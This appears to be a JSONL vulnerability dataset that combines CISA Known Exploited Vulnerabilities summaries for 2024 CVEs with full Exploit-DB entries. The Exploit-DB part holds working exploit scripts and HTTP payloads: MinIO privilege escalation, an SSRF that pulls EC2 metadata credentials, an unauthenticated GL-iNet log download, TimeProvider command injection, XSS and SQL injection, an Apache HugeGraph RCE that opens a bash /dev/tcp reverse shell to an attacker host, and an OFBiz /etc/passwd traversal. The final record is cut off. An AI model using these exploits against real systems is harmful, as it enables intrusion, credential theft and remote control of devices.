Disclosure Vulnerability\n\nAffected: Android Pixel\n\nAndroid Pixel contains an information disclosure vulnerability in the fastboot firmware used to support unlocking, flashing, and locking affected devices.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-908\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-29745", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-27198", "text": "JetBrains TeamCity Authentication Bypass Vulnerability\n\nAffected: JetBrains TeamCity\n\nJetBrains TeamCity contains an authentication bypass vulnerability that allows an attacker to perform admin actions.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-27198", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23225", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and visionOS kernel contain a memory corruption vulnerability that allows an attacker with arbitrary kernel read and write capability to bypass kernel memory protections.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalo", "cve_id": "CVE-2024-23225", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23296", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and watchOS RTKit contain a memory corruption vulnerability that allows an attacker with arbitrary kernel read and write capability to bypass kernel memory protections.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-23296", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21338", "text": "Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CW", "cve_id": "CVE-2024-21338", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-1709", "text": "ConnectWise ScreenConnect Authentication Bypass Vulnerability\n\nAffected: ConnectWise ScreenConnect\n\nConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Explo", "cve_id": "CVE-2024-1709", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21410", "text": "Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-287\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21410", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21412", "text": "Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Internet Shortcut Files contains an unspecified vulnerability that allows for a security feature bypass.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21412", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21351", "text": "Microsoft Windows SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SmartScreen contains a security feature bypass vulnerability that allows an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n", "cve_id": "CVE-2024-21351", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21762", "text": "Fortinet FortiOS Out-of-Bound Write Vulnerability\n\nAffected: Fortinet FortiOS\n\nFortinet FortiOS contains an out-of-bound write vulnerability that allows a remote unauthenticated attacker to execute code or commands via specially crafted HTTP requests.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21762", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21893", "text": "Ivanti Connect Secure, Policy Secure, and Neurons Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Ivanti Connect Secure, Policy Secure, and Neurons\n\nIvanti Connect Secure (ICS, formerly known as Pulse Connect Secure), Ivanti Policy Secure, and Ivanti Neurons contain a server-side request forgery (SSRF) vulnerability in the SAML component that allows an attacker to access certain restricted resources without authentication.\n\nRequired Action: Apply mitigations per vendor instructions o", "cve_id": "CVE-2024-21893", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23222", "text": "Apple Multiple Products WebKit Type Confusion Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and Safari WebKit contain a type confusion vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per vendor instructions or disco", "cve_id": "CVE-2024-23222", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-0519", "text": "Google Chromium V8 Out-of-Bounds Memory Access Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains an out-of-bounds memory access vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of th", "cve_id": "CVE-2024-0519", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21887", "text": "Ivanti Connect Secure and Policy Secure Command Injection Vulnerability\n\nAffected: Ivanti Connect Secure and Policy Secure\n\nIvanti Connect Secure (ICS, formerly known as Pulse Connect Secure) and Ivanti Policy Secure contain a command injection vulnerability in the web components of these products, which can allow an authenticated administrator to send crafted requests to execute code on affected appliances. This vulnerability can be leveraged in conjunction with CVE-2023-46805, an authenticated", "cve_id": "CVE-2024-21887", "source": "cisa_kev", "timestamp": ""} {"id": "53284fec4bfcd72d4e46", "text": "MinIO < 2024-01-31T20-20-33Z - Privilege Escalation\n\n# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation\n# Date: 2024-04-11\n# Exploit Author: Jenson Zhao\n# Vendor Homepage: https://min.io/\n# Software Link: https://github.com/minio/minio/\n# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z\n# Tested on: Windows 10\n# CVE : CVE-2024-24747\n# Required before execution: pip install minio,requests\n\nimport argparse\nimport datetime\nimport traceback\nimport urllib\nfrom xml.dom.minidom import parseString\nimport requests\nimport json\nimport base64\nfrom minio.credentials import Credentials\nfrom minio.signer import sign_v4_s3\n\nclass CVE_2024_24747:\n new_buckets = []\n old_buckets = []\n def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):\n self.bucket_names = ['pocpublic', 'pocprivate']\n self.new_accesskey = 'miniocvepoc'\n self.new_secretkey = 'MINIOcvePOC'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',\n 'Content-Type': 'application/json',\n 'Accept': '*/*'\n }\n self.accesskey = accesskey\n self.secretkey = secretkey\n self.verify = verify\n if verify:\n self.url = \"https://\" + host + \":\" + port\n self.console_url = \"https://\" + host + \":\" + console_port\n else:\n self.url = \"http://\" + host + \":\" + port\n self.console_url = \"http://\" + host + \":\" + console_port\n self.credits = Credentials(\n access_key=self.new_accesskey,\n secret_key=self.new_secretkey\n )\n self.login()\n try:\n self.create_buckets()\n self.create_accesskey()\n self.old_buckets = self.console_ls()\n self.console_exp()\n self.new_buckets = self.console_ls()\n\n except:\n traceback.print_stack()\n finally:\n self.delete_accesskey()\n self.delete_buckets()\n if len(self.new_buckets) > len(self.old_buckets):\n print(\"There is CVE-2024-24747 problem with the minio!\")\n print(\"Before the exploit, the buckets are : \" + str(self.old_buckets))\n print(\"After the exploit, the buckets are : \" + str(self.new_buckets))\n else:\n print(\"There is no CVE-2024-24747 problem with the minio!\")\n\n def login(self):\n url = self.url + \"/api/v1/login\"\n payload = json.dumps({\n \"accessKey\": self.accesskey,\n \"secretKey\": self.secretkey\n })\n self.session = requests.session()\n if self.verify:\n self.session.verify = False\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 204:\n status_code = 0\n else:\n print('Login failed! Please check if the input accesskey and secretkey are correct!')\n exit(1)\n def create_buckets(self):\n url = self.url + \"/api/v1/buckets\"\n for name in self.bucket_names:\n payload = json.dumps({\n \"name\": name,\n \"versioning\": False,\n \"locking\": False\n })\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 200:\n status_code = 0\n else:\n print(\"新建 (New)\"+name+\" bucket 失败 (fail)!\")\n def delete_buckets(self):\n for name in self.bucket_names:\n url = self.url + \"/api/v1/buckets/\" + name\n status_code = self.session.request(\"DELETE\", url, headers=self.headers).status_code\n # print(status_code)\n if status_code == 204:\n status_code = 0\n else:\n print(\"删除 (delete)\"+name+\" bucket 失败 (fail)!\")\n def create_accesskey(self):\n url = self.url + \"/api/v1/service-account-credentials\"\n payload = json.dumps({\n \"policy\": \"{ \\n \\\"Version\\\":\\\"2012-10-17\\\", \\n \\\"Statement\\\":[ \\n { \\n \\\"Effect\\\":\\\"Allow\\\", \\n \\\"Action\\\":[ \\n \\\"s3:*\\\" \\n ], \\n \\\"Resource\\\":[ \\n \\\"arn:aws:s3:::pocpublic\\\", \\n \\\"arn:aws:s3:::pocpublic/*\\\" \\n ] \\n } \\n ] \\n}\",\n \"accessKey\": self.new_accesskey,\n \"secretKey\": self.new_secretkey\n })\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 201:\n # print(\"新建 (New)\" + self", "cve_id": "CVE-2024-24747", "source": "exploitdb", "timestamp": "2024-04-12T00:00:00+00:00"} {"id": "e16470793a1a838768b6", "text": "Ladder v0.0.21 - Server-side request forgery (SSRF)\n\n# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)\n# Date: 2024-01-20\n# Exploit Author: @_chebuya\n# Software Link: https://github.com/everywall/ladder\n# Version: v0.0.1 - v0.0.21\n# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)\n# CVE: CVE-2024-27620\n# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs\n\nimport requests\nimport json\n\ntarget_url = \"http://127.0.0.1:8080/api/\"\nimdsv1_url = \"http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance\"\n\nr = requests.get(target_url + imdsv1_url)\nresponse_json = json.loads(r.text)\nprint(response_json[\"body\"])", "cve_id": "CVE-2024-27620", "source": "exploitdb", "timestamp": "2024-03-10T00:00:00+00:00"} {"id": "160d9b144ad024859614", "text": "GL-iNet MT6000 4.5.5 - Arbitrary File Download\n\n# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download\n# CVE: CVE-2024-27356\n# Google Dork: intitle:\"GL.iNet Admin Panel\"\n# Date: 2/26/2024\n# Exploit Author: Bandar Alharbi (aggressor)\n# Vendor Homepage: www.gl-inet.com\n# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin\n# Tested Model: GL-X3000 Spitz AX\n# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md\n\nimport sys\nimport requests\nimport json\nrequests.packages.urllib3.disable_warnings()\nh = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}\n\ndef DoesTarExist():\n r = requests.get(url+\"/js/logread.tar\", verify=False, timeout=30, headers=h)\n if r.status_code == 200:\n f = open(\"logread.tar\", \"wb\")\n f.write(r.content)\n f.close()\n print(\"[*] Full logs archive `logread.tar` has been downloaded!\")\n print(\"[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!\")\n return True\n else:\n print(\"[*] The `logread.tar` archive does not exist however ... try again later!\")\n return False\n\ndef isVulnerable():\n r1 = requests.post(url+\"/rpc\", verify=False, timeout=30, headers=h)\n if r1.status_code == 500 and \"nginx\" in r1.text:\n r2 = requests.get(url+\"/views/gl-sdk4-ui-login.common.js\", verify=False, timeout=30, headers=h)\n if \"Admin-Token\" in r2.text:\n j = {\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"call\",\"params\":[\"\",\"ui\",\"check_initialized\"]}\n r3 = requests.post(url+\"/rpc\", verify=False, json=j, timeout=30, headers=h)\n ver = r3.json()['result']['firmware_version']\n model = r3.json()['result']['model']\n if ver.startswith(('4.')):\n print(\"[*] Firmware version (%s) is vulnerable!\" %ver)\n print(\"[*] Device model is: %s\" %model)\n return True\n print(\"[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!\")\n return False\n\ndef isAlive():\n try:\n r = requests.get(url, verify=False, timeout=30, headers=h)\n if r.status_code != 200:\n print(\"[*] Make sure the target's web interface is accessible!\")\n return False\n elif r.status_code == 200:\n print(\"[*] The target is reachable!\")\n return True\n except Exception:\n print(\"[*] Error occurred when connecting to the target!\")\n pass\n return False\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"exploit.py url\")\n sys.exit(0)\n url = sys.argv[1]\n url = url.lower()\n if not url.startswith(('http://', 'https://')):\n print(\"[*] Invalid url format! It should be http[s]://\")\n sys.exit(0)\n if url.endswith(\"/\"):\n url = url.rstrip(\"/\")\n\n print(\"[*] GL.iNet Unauthenticated Full Logs Downloader\")\n\n try:\n if (isAlive() and isVulnerable()) == (True and True):\n DoesTarExist()\n except KeyboardInterrupt:\n print(\"[*] The exploit has been stopped by the user!\")\n sys.exit(0)", "cve_id": "CVE-2024-27356", "source": "exploitdb", "timestamp": "2024-04-02T00:00:00+00:00"} {"id": "70d5b634ebf77da5ef52", "text": "Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection\n\n# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection\n\n# Exploit Author: Armando Huesca Prida\n\n# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli\n\n# Date of Disclosure: 27/06/2024\n\n# Date of CVE Publication: 4/10/2024\n\n# Exploit Publication: 10/10/2024\n\n# Vendor Homepage: https://www.microchip.com/\n\n# Version: Firmware release 1.0 through 2.4.7\n\n# Tested on: Firmware release 2.3.12\n\n# CVE: CVE-2024-9054\n\n# External References:\n\n# URL: https://www.cve.org/cverecord?id=CVE-2024-9054\n\n# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html\n\n# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file\n\n# URL: https://www.gruppotim.it/it/footer/red-team.html\n\n\n\n\n\n# Vulnerability Description:\n\n\n\nA Remote Code Execution (RCE) vulnerability exists in the \"secret_key\" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.\n\n\n\n\n\n# Exploitation Steps:\n\n\n\n1- Perform login into the device's management web interface.\n\n2- Download the device's configuration file.\n\n3- Substitute the \"secret_key\" value with the malicious payload.\n\n4- Save the new configuration file containing the OS command to be executed.\n\n5- Restore and submit the new configuration.\n\n6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.\n\n\n\n\n\n# Example of malicious XML config file:\n\n\n\n\n\n[...]\n\n \n\n [...]\n\n\t\n\n \t192.168.1.1\n\n \t`ping 192.168.1.20`\n\n \t[...]\n\n \t\n\n [...]\n\n \n\n[...]\n\n\n\n# Proof of Concept - PoC:\n\n\n\nManually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:\n\n- [session cookie]\n\n- [XML configuration file containing the injection on \"secret_key\" tag]\n\n- [Web account password in clear-text]\n\n- [device IP]\n\n\n\n\n\n# Exploit - Restore and submit config file HTTP Request:\n\n\n\nPOST /config_restore HTTP/1.1\n\nHost: [device IP]\n\nCookie: ci_session=[session cookie]\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\n\nAccept: */*\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate, br\n\nContent-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002\n\nContent-Length: 206640\n\nOrigin: https://[device IP]\n\nReferer: https://[device IP]/configbackuprestore\n\nSec-Fetch-Dest: empty\n\nSec-Fetch-Mode: cors\n\nSec-Fetch-Site: same-origin\n\nTe: trailers\n\nConnection: keep-alive\n\n\n\n-----------------------------182708909322642582691204887002\n\nContent-Disposition: form-data; name=\"file\"; filename=\"tp4100_cfg.txt\"\n\nContent-Type: text/plain\n\n\n\n[XML configuration file containing the injection on \"secret_key\" tag]\n\n-----------------------------182708909322642582691204887002\n\nContent-Disposition: form-data; name=\"pword\"\n\n\n\n[Web account password in clear-text]\n\n-----------------------------182708909322642582691204887002--\n\n\n\n\n\n# End", "cve_id": "CVE-2024-9054", "source": "exploitdb", "timestamp": "2025-04-04T00:00:00+00:00"} {"id": "2807114e2c5ce71b8da5", "text": "Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)\n\n# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)\n\n# Exploit Author: Armando Huesca Prida\n\n# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli\n\n# Date of Disclosure: 27/06/2024\n\n# Date of CVE Publication: 4/10/2024\n\n# Exploit Publication: 10/10/2024\n\n# Vendor Homepage: https://www.microchip.com/\n\n# Version: Firmware release 1.0 through 2.4.7\n\n# Tested on: Firmware release 2.3.12\n\n# CVE: CVE-2024-43687\n\n# External References:\n\n# URL: https://www.cve.org/cverecord?id=CVE-2024-43687\n\n# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html\n\n# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner\n\n# URL: https://www.gruppotim.it/it/footer/red-team.html\n\n\n\n\n\n# Vulnerability Description:\n\n\n\nThe TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.\n\n\n\n\n\n# Exploitation Steps:\n\n\n\n1- Log in to the device's web management interface.\n\n2- Open the banner configuration panel.\n\n3- Select the \"custom banner\" feature.\n\n4- Insert the malicious JavaScript payload.\n\n5- Apply and save the system configuration containing the custom banner.\n\n6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.\n\n\n\n\n\n# Example of malicious JavaScript payload:\n\n\n\n\n\n\n\n\n\n# Proof of Concept - PoC:\n\n\n\nBy manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below:\n\n- [session cookie]\n\n- [malicious JavaScript payload]\n\n- [device IP]\n\n\n\n\n\n# Exploit - HTTP Request:\n\n\n\nPOST /bannerconfig HTTP/1.1\n\nHost: [device IP]\n\nCookie: ci_session=[session cookie]\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate, br\n\nContent-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502\n\nContent-Length: 673\n\nOrigin: https://[device IP]\n\nReferer: https://[device IP]/bannerconfig\n\nUpgrade-Insecure-Requests: 1\n\nSec-Fetch-Dest: document\n\nSec-Fetch-Mode: navigate\n\nSec-Fetch-Site: same-origin\n\nSec-Fetch-User: ?1\n\nTe: trailers\n\nConnection: keep-alive\n\n\n\n-----------------------------9680247575877256312575038502\n\nContent-Disposition: form-data; name=\"user_level\"\n\n\n\n1\n\n-----------------------------9680247575877256312575038502\n\nContent-Disposition: form-data; name=\"bannerradio\"\n\n\n\nCUSTOMIZED\n\n-----------------------------9680247575877256312575038502\n\nContent-Disposition: form-data; name=\"txtcustom\"\n\n\n\n[malicious JavaScript payload]\n\n\n\n-----------------------------9680247575877256312575038502\n\nContent-Disposition: form-data; name=\"action\"\n\n\n\napplybanner\n\n-----------------------------9680247575877256312575038502--\n\n\n\n\n\n\n\n# End", "cve_id": "CVE-2024-43687", "source": "exploitdb", "timestamp": "2025-04-04T00:00:00+00:00"} {"id": "593bd1de7bf7ad1b1e30", "text": "Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection\n\n# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection\n\n# Exploit Author: Armando Huesca Prida, Marco Negro\n\n# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli\n\n# Date of Disclosure: 27/06/2024\n\n# Date of CVE Publication: 4/10/2024\n\n# Exploit Publication: 11/10/2024\n\n# Vendor Homepage: https://www.microchip.com/\n\n# Version: Firmware release 1.0 through 2.4.7\n\n# Tested on: Firmware release 2.3.12\n\n# CVE: CVE-2024-7801\n\n# External References:\n\n# URL: https://www.cve.org/cverecord?id=CVE-2024-7801\n\n# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html\n\n# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection\n\n# URL: https://www.gruppotim.it/it/footer/red-team.html\n\n\n\n\n\n# Vulnerability Description:\n\n\n\nThe TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.\n\n\n\n\n\n# Example of Malicious SQL Payload:\n\n\n\nSELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--\n\n\n\n\n\n# Proof of Concept - PoC:\n\n\n\nBy manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values that must be updated in the exploit HTTP request is given below:\n\n- [malicious SQL payload]\n\n- [device IP]\n\n\n\n\n\n# Exploit - HTTP Request:\n\n\n\nPOST /get_chart_data HTTP/1.1\n\nHost: [device IP]\n\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\n\nAccept: application/json, text/javascript, */*; q=0.01\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate, br\n\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nX-Requested-With: XMLHttpRequest\n\nContent-Length: 146\n\nOrigin: https://[device IP]\n\nReferer: https://[device IP]/perfmon_synce_stat\n\nSec-Fetch-Dest: empty\n\nSec-Fetch-Mode: cors\n\nSec-Fetch-Site: same-origin\n\nTe: trailers\n\nConnection: keep-alive\n\n\n\nmetric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=\n\n1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1\n\n\n\n\n\n\n\n# End", "cve_id": "CVE-2024-7801", "source": "exploitdb", "timestamp": "2025-04-05T00:00:00+00:00"} {"id": "f1e81c20de1407119a77", "text": "Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)\n# Exploit Author: Yesith Alvarez\n# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/\n# Version: Apache HugeGraph 1.0.0 - 1.2.0\n# CVE : CVE-2024–27348\n\nfrom requests import Request, Session\nimport sys\nimport json\n\ndef title():\n print('''\n\n ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\| || | |___ \\___ |___ /| || | ( _ )\n | | \\ \\ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \\| || |_ / _ \\\n | |___ \\ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |\n \\____| \\_/ |_____| |_____|\\___/_____| |_| |_____/_/ |____/ |_| \\___/\n\n[+] Reverse shell\nAuthor: Yesith Alvarez\nGithub: https://github.com/yealvarez\nLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/\nCode improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py\n ''')\n\n\ndef exploit(url, lhost, lport):\n payload = {\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"VICARIUS\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"bash\\\", \\\"-c\\\", \\\"bash -i>&/dev/tcp/\"+lhost+\"/\"+lport+\"\\\", \\\"0>&1\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n headers = {\n 'Content-Type': 'application/json'}\n s = Session()\n url = url + \"/gremlin\"\n req = Request('POST', url, json=payload, headers=headers)\n prepped = req.prepare()\n del prepped.headers['Content-Type']\n resp = s.send(prepped,\n verify=False,\n timeout=15)\n print(prepped.headers)\n print(url)\n print(resp.headers)\n print(payload)\n print(resp.status_code)\n print(resp.text)\n\n\nif __name__ == '__main__':\n title()\n if(len(sys.argv) < 4):\n print('[+] USAGE: python3 %s https:// lhost lport \\n'%(sys.argv[0]))\n print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\\n'%(sys.argv[0]))\n print('[+] Do not forget to run the listener: nc -lvp 4444\\n')\n exit(0)\n else:\n exploit(sys.argv[1],sys.argv[2],sys.argv[3])", "cve_id": "CVE-2024-27348", "source": "exploitdb", "timestamp": "2025-04-09T00:00:00+00:00"} {"id": "7542b1922a8d8b4f77c3", "text": "Apache OFBiz 18.12.12 - Directory Traversal\n\n# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal\n# Google Dork: N/A\n# Date: 2024-05-16\n# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)\n# Vendor Homepage: https://ofbiz.apache.org/\n## Software Link: https://ofbiz.apache.org/download.html\n# Version: below <=18.12.12\n# Tested on: Windows10\n\n\nPoc.\n1-\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: text/xml\n\n\n\n example.createBlogPost\n \n \n ../../../../../../etc/passwd\n \n \n\n\nOR\n\n2-\nPOST /webtools/control/xmlrpc HTTP/1.1\nHost: vulnerable-host.com\nContent-Type: 